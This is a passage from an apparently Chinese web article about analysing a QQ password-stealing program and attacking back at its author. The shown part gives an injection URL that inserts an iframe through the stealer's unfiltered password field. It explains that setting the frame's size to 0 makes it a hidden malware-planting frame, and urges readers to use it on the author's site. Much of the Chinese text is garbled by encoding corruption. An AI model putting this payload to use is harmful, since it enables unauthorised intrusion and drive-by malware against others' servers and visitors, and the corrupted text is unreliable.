找出安全漏洞 QQ盜號軟件后門分析與反擊
您當(dāng)前位置:首頁 > 紅訊頻道 > 網(wǎng)絡(luò)技術(shù)
紅軟基地 推薦
2012-01-17
再次證明對提交的數(shù)據(jù)是無任何限制的...我們完全可以自己發(fā)揮想象.插入任何代碼都可以...
如果想反掛馬的話..我們就可以提交以下數(shù)據(jù)
| 以下是引用片段: http://www.ciker.org/soft/qq.asp?QQNumber=123&QQPassWord=<iframe%20&# ... 20width=480%20height=480></iframe> |
圖14
當(dāng)然我這里把width和height設(shè)置為480只是為了方便演示..實際掛馬中要改為0
好了..現(xiàn)在我們就可以給作者一個驚喜去了..圖15
來源:紅訊頻道